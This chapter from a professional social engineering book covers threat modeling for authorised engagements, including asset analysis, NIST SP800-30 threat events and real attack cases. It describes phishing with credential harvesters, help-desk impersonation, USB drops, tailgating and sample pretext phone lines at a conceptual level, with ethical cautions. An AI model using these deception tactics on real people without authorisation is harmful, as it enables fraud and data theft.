Chapter 6

Ensuring Value Through Effective Threat Modeling

Richard Ackroyd,    Senior Security Engineer, RandomStorm Limited

Most customers realize that they need Social Engineering, but often set unrealistic targets. This chapter helps you to steer customers away from the Mission Impossible mentality and toward more practical objectives. Practical Social Engineering is less about dropping down nuclear cooling towers on ropes while avoiding lasers, and more about delivering value by identifying risks, even where time constraints tie one hand behind your back.

Keywords

Threat modeling; Information Assurance; Risk Management process; reconnaissance and surveillance; phishing; spear phishing; organized crime groups

Information in this chapter

• Why the need for threat modeling

• Gain access to my underground bunker data center

• Consultant led threat modeling

• Plugging into the Information Assurance and Risk Management processes

• Gather information using open-source discovery of organizational information

• Perform reconnaissance and surveillance of targeted organizations

• Craft phishing attacks

• Craft spear phishing attacks

• Create counterfeit/spoof web site

• Deliver malware by providing removable media

• Exploit physical access of authorized staff to gain access to organizational facilities

• Conduct outsider-based social engineering to obtain information

• Conduct insider-based social engineering to obtain information

• Obtain information by opportunistically stealing or scavenging information systems/components

• Who would want to gain access to my business?

• State-sponsored/terrorist groups

• Organized crime groups

• Trouble causers, hobbyists, and lone gunmen

• Other players

Introduction

Chapter 5 looked at how an actual social engineering engagement works, who is involved, and how to ensure a smooth delivery.

This chapter will cover the process of ensuring that effective threat modeling is applied to the engagement. This chapter will cover examples of business critical assets as well as potential attack vectors for those assets. For example, why attempt to gain access to the highly secured data center, when the receptionist’s computer can get to the same data?

Additionally, it will take a look at the types of information that will be needed from the client in order to establish the key assets. This can include network diagrams, traffic flows, organizational hierarchies, host information, and more. All of this assumes that the test is not entirely black-box in nature, by which we mean that the engineer does not get access to any information in advance of the test.

Most professional services consultants will be more than familiar with the need to guide a client down the right path when it comes to services rendered. While the client may know that they need a service, they may not fully understand the subtleties of the profession to the extent required. It is for this reason that you will often see unrealistic requests in terms of target selection. As a social engineer, it is a big part of your job to ensure that realistic and relevant objectives are set and achieved through the use of threat modeling. Threat modeling is very much a consultative process that the engineer and client must explore if a project is going to be successful.

In some cases, the client will know exactly which systems and processes they will need to assess. This is often the case where the organization is already engaged in an Information Assurance (IA) process that includes Risk Management.

Furthermore, this chapter will take a look at the sort of people that may want to gain access to the data and related systems. It is not uncommon for people to think that a hacker on the Internet somewhere would be responsible for most of these breaches; however it could also be a competitor, political activists, or foreign government agents.

Some real-world examples of these breaches will bring the chapter to a close and help to identify how real-world attackers gain access to the data we are trying to protect.

Why the need for threat modeling?

On the face of it, this may appear to be a chapter that is surplus to requirements. People would be forgiven for thinking that an individual working in a modern organization would always be able to identify their key assets and build suitable defenses around them. Penetration testing and social engineering engagements down the years have taught me that this is rarely the case, sometimes to quite an eye-opening extent.

A recent example was during a recent internal assessment where the client had moved into a new facility and as a result everything was brand new. All the servers were running the very latest operating system and were fully patched. The same could be said of the desktop estate. What the client didn’t know was that an employee had plugged a rogue access point into the corporate network and configured it with WEP no less. The point being made here is that if a business thinks that they know about everything that is going on in the organization and infrastructures, the chances are they don’t. The client in question had spent a lot of time and effort securing what they believed were the only entry points to their most critical assets. They had installed Firewalls and Intrusion Prevention System (IPS), used up-to-date software and best practices, but what they didn’t do is shut down any unused switch ports and enable port security or monitor for rogue access points. Although this may not be directly related to Social Engineering, it’s nigh on impossible to know all the entry points to an asset if the focus is purely on technology. A Firewall will never stop an authorized member of staff from leaking critical information over the phone, neither will the former “Nuclear Bunker” that the Data Center is housed in. As a result, the reasons for needing threat modeling are clear. It’s very difficult to even identify the critical assets without taking a step back and looking at the bigger picture. Therefore, let’s talk through a common example of a client requirement, and why it isn’t always particularly realistic.

Gain access to my underground bunker data center

The first target that comes into most clients’ minds is the Data Center or Server Room. But how realistic a choice is this, and is it even feasible to get into a properly run Data Center without a team of Navy Seals?

The main reason for this type of thinking is that most people will automatically think Crown Jewels and then their chain of thought leads them to where those assets are physically stored. This is kind of funny given the highly connected nature of the assets we are dealing with, and the entirely nonphysical nature of them to boot.

The asset needs to be defined to the client to enable them to move away from this thinking. The information is an asset, not just the physical server. The focus here is in protecting against the exfiltration of sensitive data, so let’s explore the attack vectors for that. While not wanting to get bogged down in talk of asset and risk classification just now, it does need to be briefly touched upon. The client needs to define what is important to them as a business, to find out who and what has access to it, and assess the risk and vulnerabilities associated to the asset(s). It could be intellectual property, client data, or even credit card details.

Armed Sentry Guards could be posted at the Server Room doors, supported by all the physical security bells and whistles that can BE mustered, but if there is a bank of desktop PCs located in an unguarded office that have the required access to the data, these measures are pointless.

How is realistic threat modeling achieved? There are two serious options: The first is to go through a consultative process with the client and help them to understand their own risks. The second is to plug into the IA process that the business may have already undertaken. This process will include a full asset enumeration, classification, and risk and vulnerability definition. Both the consultant led and less formal approach will be covered, before touching upon the IA process for risk analysis and management.

Consultant led threat modeling

At this point, the likely reaction will be—“I’m a social engineer not an IA consultant.” Luckily, this process does not need to become a fully fledged IA endeavor, far from it in fact. The vast majority of what is going to be done will actually be common sense.

When it comes to this process, the client is going to have to bring certain pieces of information so that an accurate assessment of the attack vectors can take place. A suitable approach can be to follow a “what, why, who, where, and how” approach when it comes to establishing where the risks lie. This approach is no doubt less formal than going down the IA route, but it is still a very valuable tool, both for you and your client.

What?

What is the asset? What is the key piece of information that needs to be protected? What regulatory guidelines does it fall under? It is likely that the vast majority of clients know what their key data is, but maybe they won’t know how a malicious social engineer would attempt to gain access to it. For example, the data may be intellectual property in the form of plans for a new product, which are stored in a database. The client may feel that an attacker would have to gain physical access to the network to recover the data but he may choose to manipulate somebody within the organization that has access to the asset. The information may be stored in hard copy in a filing cabinet elsewhere within the business, and if so, is it sufficiently secured?

In terms of the type of information required to dive into this topic, you are largely going to be looking through network diagrams and asset lists for the vast majority of cases. There will be instances in which plans and confidential data will be kept on hard record, and this needs to be accounted for throughout this process. Part of this process may be for your client to know where all of the information is stored, including physical copies. This task on its own could take even a small business a very long time and should not be underestimated.

Why?

Why is the asset important? Why is it important that this information is protected against leakage? The impact may be purely financial due to fines levied by regulatory bodies. On the other hand, the data being leaked could be classified in nature and cause compromises in combat scenarios. Loss of reputation is also a common issue wherever a compromise occurs. Whatever the reason for the asset’s significance, it is worthwhile thinking about classifying each of them and assigning a value to them that allows you to prioritize the work. The client may feel that a user who leaks passwords is the biggest fear, but if client data is leaked, it could bring with it a hefty fine in line with the Data Protection Act 1998, as well as a significant reputational damage. Just look at Sony’s £250,000 fine as an example. It’s not that passwords aren’t important, it’s just that we need to apply levels of importance to our assets. Everything in a business is there for a reason, but we can’t assign a criticality rating of 10 out of 10 to everything.

The key pieces of information required here are slightly more complicated. Involvement from stakeholders throughout the business will be required to adequately conduct the review. It is unrealistic to expect a handful of individuals to fully appreciate all risks within a business. Having people from different departments involved at this stage can leverage industry and role-specific knowledge that will be otherwise neglected.

Who?

Who has access to the asset? What departments do they work in? Can other users gain access to their systems and compromise the information? Once again the issues raised earlier return. What is the point in trying to hack through several layers of expensive security devices, when a well-targeted phishing e-mail can provide the access needed? The client already knows what the asset is, having been through the process of identifying it and its importance, but who can get to the asset? Who uses it? Why do they use it? How often and when do they use it? All of this information should start to build a picture, or flow of information that can be applied to better understand where the attack vectors are.

As with the “What?” section, there will typically be a process of analyzing the network diagrams and asset information, but also looking at staff lists and departmental information to establish role-based access.

Where?

Where is the data stored from both a physical and logical point of view? This will likely be identified to some extent in earlier sections where network and asset information is reviewed. Additionally, there is a need to have a full breakdown of where the systems are that can access the asset. Again, this is from a geographical point of view as well as from a logical one. When logical location is mentioned, this is its location on the network, which in most cases will be a designated VLAN or separate switch infrastructure. The physical location could be in a filing cabinet or in cab 421, Data Center 2, the point is how can the risk to an asset be understood if the locations are unknown? This needs to be approached from all possible angles. Physical, logical, and human issues should all be addressed.

Once again, any asset register or low-level network diagram is likely to contain the information required from a technology point of view. Departmental heads should be able to advise upon the location of hard copies.

How?

How is the asset currently protected? How is it accessed? Again, there are differing answers dependent on the asset type. In some instances, the data may be accessed by a desktop application that connects to a back-end database over a VPN to the data center. It could be protected by a Firewall and an IPS.

Hard copies are more likely to be under lock and key. Another defense type more commonly overlooked is adequate staff training and authority. It is not uncommon to be able to extract sensitive data from users over the phone if they have not been adequately trained. Likewise, they are not likely to challenge unknown visitors if they have not been given the authority to do so.

In either case, an analysis of how the data is used and how it is currently defended will complete the picture for us before proceeding with the assessment.

A great deal of information about the assets has been identified; what they are is known, and what regulations they fall under. A clear picture of why the assets are important has also been formulated.

It is fully understood who has access to the data and what their roles are within the business. It has been established where the data is stored and how it is accessed. All of this information can be used to accurately identify the real risks to the assets in question and build a list of vulnerabilities that will be fed into the social engineering engagement. These will form the basis of our assessment moving forward.

Instead of thinking get into my Data Center, the client now realizes that realistically all that is needed is to get into a filing cabinet on the second floor. The attack vector has changed massively and so has the clients understanding of how to protect their assets. Of course, this is all easier said than done. Seeing all angles and attack vectors is a difficult task, and that’s why social engineering engagements are so useful. This process in and of itself is an awareness exercise that will be of real value to any client.

Now let’s hammer the point home by filling in the above categories with something more real world.

What?

The asset/critical information is client/customer data. The way this data is handled and any subsequent breaches are under the jurisdiction of the Data Protection Act and the Information Commissioners Office.

Why?

The asset is important for a number of reasons. The financial implications of any breach are severe. Damage to reputation and loss of business are also serious consequences of any data loss.

Who?

Currently, Database Administrators, Application Developers, and Call Center staff all have access to the assets.

Where?

The data is stored both logically and physically. The client records are stored across two Data Centers in Databases, as well as hard copies in locked filing cabinets within secure rooms at the Call Center. The Call Center is within our Headquarters, which also hosts the vast majority of the staff.

How?

The Databases are protected with strong authentication, Firewalls and IPS. All records are encrypted within the database. The physical records are protected by lock and key. Any data is signed in and out by the duty manager as and when needed.

Access is gained by multiple methods. The Database Admins and Application Developers will typically access the Database Server directly via Remote Desktop Protocol and database management tools. The Call Center staff has access via an application so that they can see customer records as they take calls. This also allows them to amend or add records. The authentication for the Call Center application is handled by Active Directory and ultimately the password is chosen by the staff themselves.

Five questions and already several attack vectors are seen to open up. The Call Center staff could be a promising target, though they are more likely to have been trained to deal with inbound calls and will have scripts that are followed religiously.

Of course, if the choice is between a highly secured Data Center and a filing cabinet in an office, there isn’t much competition. There are far more plausible pretexts for being at the large HQ and far more potential targets within the business. There is also likely to be far less security and a lot more chance to blend in with the staff of the organization.

Additionally, take a good look at the Call Center staff and the application they use. It is extremely common for the direct access accounts for the Database—such as the SA account—to have very strong passwords, but then to allow the client application users to set their own passwords? This in itself could well be the best angle available. Targeted or even broader e-mail phishing attacks could really bring back some frightening results assuming each member of staff has Internet access. Alternatively, a call into those staff impersonating a help desk employee along with a well-crafted e-mail with a link to a credential harvester could be the preferred angle.

E-mail phishing attacks will be covered in far more detail in Chapter 9.

Whatever the eventual tactic employed, at the end of this process the client will be far better off than they were before, and the increased understanding of the landscape will be enough to design some effective scenarios. Going into tests blind may sometimes be a prerequisite of a client, but it can be argued that an educated engagement can often produce far more relevant and lasting results.

Plugging into the Information Assurance and Risk Management processes

While the more informal model already discussed is a great way to engage a client, build rapport, and ensure success, there are more formally defined methods for performing threat modeling.

Hopefully by the time a client (who is moving through an IA project) gets in touch with the social engineer, they should already have a well-formed idea of what the risks and vulnerabilities are, as well as the value of social engineering. It is more than likely that they will be engaging with you to address the human element of information security.

Many social engineering engagements use a blended approach of technological as well as human exploits.

For many years there have been countless information security articles about how the insider, or the employee in this case, can be the single biggest risk to organizational security. The truth of the matter is that malicious or not, people with any level of privilege within a business can pose a massive risk if not properly educated. It is important to note, that any level of privilege refers to things like insider knowledge about how a business works, what applications it uses, internal naming conventions or slang/code for systems. All of these seemingly uninteresting pieces of information can be devastating in the wrong hands, and they certainly won’t be treated with the same level of caution as a password for example. A lot of social engineering jobs start with a tiny piece of information that can be built upon to gain credibility in further endeavors.

It is for these reasons that the human element of security finds its way into a great many standards within IA. Even the most comprehensive IA effort can still be further shaped by a good social engineer.

Don’t be reluctant to reshape a client’s expectations relating to their attack vectors, even when they believe they have all of their bases covered.

The Risk Management process allows organizations to formally make informed decisions on what is an acceptable risk, with regard to Information Security and to see which parts are applicable to the field of social engineering. There are numerous Risk Management frameworks that are available, including the NIST SP800-30 that is freely available to download.

Consequently, for the purpose of this book, this has been chosen as the benchmark for Risk Management. A copy can be obtained from the following web site: http://csrc.nist.gov/publications/PubsSPs.html#800-30.

During the process of conducting the Risk Assessment, NIST SP800-30 introduces the concepts of Threat Sources and Threat Events.

The Threat Sources relevant to us are described by NIST as “Individuals, groups, organizations, or states that seek to exploit the organization’s dependence on cyber resources (i.e., information in electronic form, information and communications technologies, and the communications and information-handling capabilities provided by those technologies).” Some examples of real-world threat sources will be covered later in this chapter.

NIST defines several Threat Events that can be proactively tested during a social engineering engagement. These are as follows.

Gather information using open-source discovery of organizational information

Adversary mines publicly accessible information to gather information about organizational information systems, business processes, users or personnel, or external relationships that the adversary can subsequently employ in support of an attack.

Perform reconnaissance and surveillance of targeted organizations

Adversary uses various means (e.g., scanning, physical observation) over time to examine and assess organizations and ascertain points of vulnerability.

This kind of work is key to the reconnaissance stages of an engagement, which is covered in detail in Chapter 8.

Craft phishing attacks

Adversary counterfeits communications from a legitimate/trustworthy source to acquire sensitive information such as usernames, passwords, or SSNs. Typical attacks occur via email, instant messaging, or comparable means; commonly directing users to websites that appear to be legitimate sites, while actually stealing the entered information.

Craft spear phishing attacks

Adversary employs phishing attacks targeted at high value targets (e.g., senior leaders/executives).

Phishing attacks are covered extensively in Chapter 9.

Create counterfeit/spoof web site

Adversary creates duplicates of legitimate websites; when users visit a counterfeit site, the site can gather information or download malware.

Some real-world examples of this kind of attack are covered later in the chapter.

Deliver malware by providing removable media

Adversary places removable media (e.g., flash drives) containing malware in locations external to organizational physical perimeters but where employees are likely to find the media (e.g., facilities parking lots, exhibits at conferences attended by employees) and use it on organizational information systems.

What happens if a nonemployee picks up the USB stick? Or if an employee plugs it into a noncorporate device? This opens up the potential for serious liability in these instances. A better proof of concept might be to have the malware just report that it has been clicked. Any monitoring or compromising of systems should be very carefully controlled.

Exploit physical access of authorized staff to gain access to organizational facilities

Adversary follows (“tailgates”) authorized individuals into secure/controlled locations with the goal of gaining access to facilities, circumventing physical security checks.

Tailgating may not be the most stealthy or skillful of attack vectors, but it can certainly be among the most effective when applied correctly. In high traffic areas, this tactic can pay off in a big way. Tailgating is covered in far more detail in Chapter 11.

Conduct outsider-based social engineering to obtain information

Externally placed adversary takes actions (e.g., using email, phone) with the intent of persuading or otherwise tricking individuals within organizations into revealing critical/sensitive information (e.g., personally identifiable information).

It is heartening to see social engineering directly referenced in standards. It is testament to not only the current threat landscape, but to the idea that technology is not all that defends our privacy.

The NIST SP800-30 standard actually refers to social engineering in several places, as well as the following:

Conduct insider-based social engineering to obtain information

Internally placed adversary takes actions (e.g., using email, phone) so that individuals within organizations reveal critical/sensitive information (e.g., mission information).

Often, the efficacy of an attack is improved when it is performed from within the organization’s boundaries. A call coming through on an internal number can make a vast difference when compared to one from an external source. Similarly, it would be easier to acquire information from an individual if the perpetrator is already within their secure office space. It is often perceived that if an individual is already located within the building, it must be a trusted individual. However, this is not always the case. Running privileged assessments of this nature can offer critical insight into overall security posture. Is the organization the classic hard outer shell with a gooey nougat center, or not?

Obtain information by opportunistically stealing or scavenging information systems/components

Adversary steals information systems or components (e.g., laptop computers or data storage media) that are left unattended outside of the physical perimeters of organizations, or scavenges discarded components.

Dumpster Diving is another core tool of any social engineering team. Recovery of USB sticks or Hard Disks can be as good as it gets. What most people think of as securely erased, generally is far from it. With the prevalence of the outsourcing of data destruction, it can be all too easy to just throw away that USB stick without a care in the world. How quickly can the data destruction guys get to it, before anybody malicious does?

As mentioned earlier, some standards do provide coverage on social engineering techniques quite extensively. There are in fact other Threat Events within NIST SP800-30 that could fall within the remit of a social engineering engagement. This is especially the case where the social engineering engagement is a blended attack. These kinds of attack cover both the traditional social engineering aspects and the objectives that would usually fall under the Penetration Testing guise.

This section has been designed to provide the reader with a greater insight into Threat Modeling, both from a formal and informal perspective. Let’s move on and take a look at Threat Actors.

NIST SP800-30—Official contribution of the National Institute of Standards and Technology; not subject to copyright in the United States.

Who would want to gain access to my business?

Threat modeling cannot be introduced without providing a greater understanding of the threat actors within this space. This may well help in understanding the source of potential attacks against your business.

A lot of what is seen in the “traditional” cyber-crime world most definitely fits social engineering as well. Throughout this book there has been frequent mention of how there is often a technological aspect to social engineering, especially where large-scale breaches are concerned.

The FBI published an article which identified what they believe to be the three primary actors when it comes to cyber-crime. Here is an excerpt from that article:

Q: Where are the cyber threats coming from today?

Mr. Henry: We see three primary actors: organized crime groups that are primarily threatening the financial services sector, and they are expanding the scope of their attacks; state sponsors—foreign governments that are interested in pilfering data, including intellectual property and research and development data from major manufacturers, government agencies, and defence contractors; and increasingly terrorist groups who want to impact this country the same way they did on 9/11 by flying planes into buildings. They are seeking to use the network to challenge the United States by looking at critical infrastructure to disrupt or harm the viability of our way of life.

http://www.fbi.gov/news/stories/2012/march/shawn-henry_032712/shawn-henry_032712

The main threats, as far as the FBI see it, are organized crime groups, state-sponsored organizations, and last of all, terrorist groups.

State-sponsored/terrorist groups

There are very recent examples which validate the FBI’s opinion on this matter. For example, the “Syrian Electronic Army” (SEA) appears to be quite prolific at the moment, hacking or gaining access to the BBC Weather site and Twitter accounts for various agencies, including Reuters, The Onion, and Financial Times. At the time of writing, it is too soon to fully understand how the @thomsonreuters twitter account was compromised, but The Onion and Financial Times hacks by the same perpetrators have been confirmed as phishing attacks.

Check Chapter 9 to see how easy it is to perform phishing attacks for security-auditing purposes.

Yes, people are still clicking links in e-mails with reckless abandon. The Financial Times example was a very simple e-mail with a link, which looked like it would hit a Cable News Network article. Once the link was clicked, it actually went to a compromised WordPress site. The WordPress site redirected to a forged Financial Times Webmail page. It was at this point that credentials were harvested as the user entered them.

The SEA certainly fit the FBI’s notion of primary threat actors. The SEA are thought to be political activists working for Syrian President Bashar al-Assad. What would the SEA gain from such breaches? In most cases, the motive has been to post propaganda on western media sites, this was certainly the case in the BBC Weather Twitter hack.

In the case of a recently compromised Associated Press Twitter account, the SEA were able to send the stock market into panic and drop the value of the Dow Jones by $136 billion. They achieved this by claiming that explosions within the White House had killed the President. Not only did they use social engineering to gain access to the accounts, but they then used impersonation to achieve their objective too. It’s interesting just how often basic impersonation is used in social engineering engagements. A phone call posing as another individual or an e-mail from a domain that looks a lot like the target’s can often provide just enough leverage.

Organized crime groups

Again, there are plenty of cases out there that indicate the use of social engineering techniques. The vast majority implement broad-scale phishing attacks. This is very likely down to the simplicity, low maintenance, and large target audience of such scams. A very recent case (June 19, 2013) was uncovered by the Met Police Central e-Crime Unit, the Serious Organised Crime Agency, and the US Secret Service. The general idea behind the phishing scam was to gain access to the bank accounts of its victims. The group hosted in excess of 2500 fake web sites that were clones of legitimate banking sites. It was estimated that £59m of fraud was prevented in the United Kingdom alone. Possibly the most interesting aspect of this entire scam was its scale. The attacks were successful against people from across the globe, not just from the United States and United Kingdom as you may be forgiven for thinking.

Trouble causers, hobbyists, and lone gunmen

While the FBI has covered all the major bases, there are always going to be outliers. Just because a social engineer or hacker is not state sponsored does not mean that this should be taken any less seriously. On the contrary, it is often the hobbyist, trouble causer, or prankster that causes us the biggest problems.

One of the most famous cases of recent times was that of the Australian Radio pranksters from 2Day FM. The prank was simple, call the hospital that the Duchess of Cambridge was admitted to, pretend to be Queen Elizabeth II, and see where it leads. The truth of the matter is that the DJs were not expecting to be put through to anybody, let alone be given actual information. Where the call led couldn’t have been predicted by anybody. First of all, the level of information given could be deemed interesting to say the least. This included information such as visiting times, as well as the movements of Prince William as well as the general condition of the Duchess. In an industry where patient confidentiality is so highly guarded, it is surprising that this sort of thing is allowed to happen. Sadly, this is not where the story ends. Following on from the media uproar, the nurse that disclosed the information committed suicide. She had left a note blaming the Radio DJs for her death. While this is an extreme and saddening case, there are things that we can learn as social engineers. First of all, how much formal training the nurses had been given regarding the handling of phone calls? It is hoped that they had not only been trained, but made aware of social engineering on the whole. If it wasn’t Radio pranksters making the call, it would have been Journalists trying to get a scoop.

Another point worth making is that if the right person is phoned, the right act is given and the right questions asked, it is very likely that answers will be obtained. Even in extreme and sometimes silly circumstances. This is a case of building a pretext and using it to gain unauthorized access.

We covered pretexts in more detail in Chapter 3.

A final point is one of an ethical nature. It is very difficult for a social engineer to keep themselves in check and still be able to live the pretext. It can be easy to be swept away into doing something you may regret. Don’t forget that the person on the other end of that phone does not want to be a victim of your deception. This is where not naming names comes into the picture again. We are not in this business to single out individuals and embarrass or shame them. As with the Nurse in this story, the consequences can be truly horrible. Always bare this in mind when engaging with a client. Emphasize the point of company-wide education, not individual naming and punishment.

Thinking about the amount of damage caused by a single prank call really puts things in perspective. It is almost certain that the hospital in question will have introduced all kinds of formal training to try and address the shortcomings they fell victim to. The damage to their reputation was obviously tangible. There are usually financial implications for the unauthorized leakage of patient records too. Sadly, there was far more than reputation and money at stake in this instance.

Other players

There are plenty of other individuals who would seek to gain information from people or businesses without your consent. It is most likely that these people are employed to do this for “an honest living.” Salespeople are a classic example of social engineers. A Salesperson will not hesitate to be creative with the truth to win business. Largely, these will be in the form of smaller mistruths that allow them to get on the phone with their target. These can often be as simple as “Can you pass me through to Andrew Mason, he is expecting my call?” or “Hi, I was just speaking with Gavin Watson and was cut off, could you pass me back through please? It is an urgent matter.” The impact of allowing sales calls through to staff could probably be deemed a nuisance at best, but the lack of process that allows this to happen is worthy of serious review.

Are there any other risks that do not fall into our already defined categories? What about competitors?

If a Salesperson can get through to the right people, what is THERE to stop your rivals utilizing the same flaws? Competitive intelligence may be deemed legal, but industrial and economic espionage are not. This has not halted their existence however. Telekom Malaysia Bhd had to investigate an alleged case of industrial espionage recently. They had received complaints that an employee of one of its partners had gained access to a rival’s facility by posing as a member of Telekom Malaysia’s entourage. Tailgating is one thing, but being recognized as a member of a larger, authorized group? Defending against these kinds of issues can be difficult at the best of times. Diligence when dealing with large groups of visitors is the key here, do not bypass any policies on visitors just because it’s too difficult to deal with large volumes of them. Shortcutting the usual procedures will always lead to problems.

This section of the chapter covered the various threat actors that could potentially use social engineering against you. There are no doubt more, and in many cases it will be specific to each particular industry. Who is most likely to target you and why?

Summary

This chapter covered threat modeling and what that means to the real world. First of all, the subject on the need for threat modeling was touched upon.

Getting a client to think outside of the box was the first driver for threat modeling. Why an attacker may think differently, and how they may take an entirely unexpected route to the critical data. This was to hit home upon the Get into my Data Center point. This is often not the easiest way to exfiltrate data. Why go in the front door, when a side door grants us the same level of access with far fewer complications?

Next the chapter covered how to apply practical knowledge to build a threat model. In this section, we covered how to lead a client through the process of accurately identifying attack vectors. This was a practical approach that most people would be comfortable working through, and that could be a basis for your own model.

Next came an example of how this would look in the real world. The last point was to identify which pieces of information were useful to us as social engineers.

Having covered the informal process, a more in-depth look at a more formal approach to risk management was provided. This was in the form of NIST’s SP800-30 standard. This standard could be one of many chosen by an organization to assess and mitigate against information leakage.

The great thing about this standard is that it is publicly available for you to download today, at no cost. On top of this, it actually directly references social engineering as a threat event. There were several threat events identified within the standard that fit perfectly into social engineering engagements. This covered dumpster diving, tailgating, and phishing attacks among others.

We then moved onto the topic of Threat Actors. These are the guys that are trying to get into your organization and steal your data or damage your reputation. Covered next were some great real-world examples, most of which were actually very recent. Additionally, this chapter also looked at state-sponsored groups, in this case the SEA’s phishing attack against BBC Weather, The Financial Times, and The Onion.

Next taking a brief look at organized crime groups and a real-world example involving over 2500 fake web sites. These sites were designed to harvest online banking credentials for nefarious purposes. In this particular case, we were looking at potential financial implications in the tens of millions.

We then took a look at the unfortunate case of the 2Day FM radio prank, which had serious and far-reaching consequences. This reminded us to always be aware of the ethical implications of your actions, and not to let the pretext own your actions.

Onward to Chapter 7—the process of building a scenario from the ground up will be covered.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset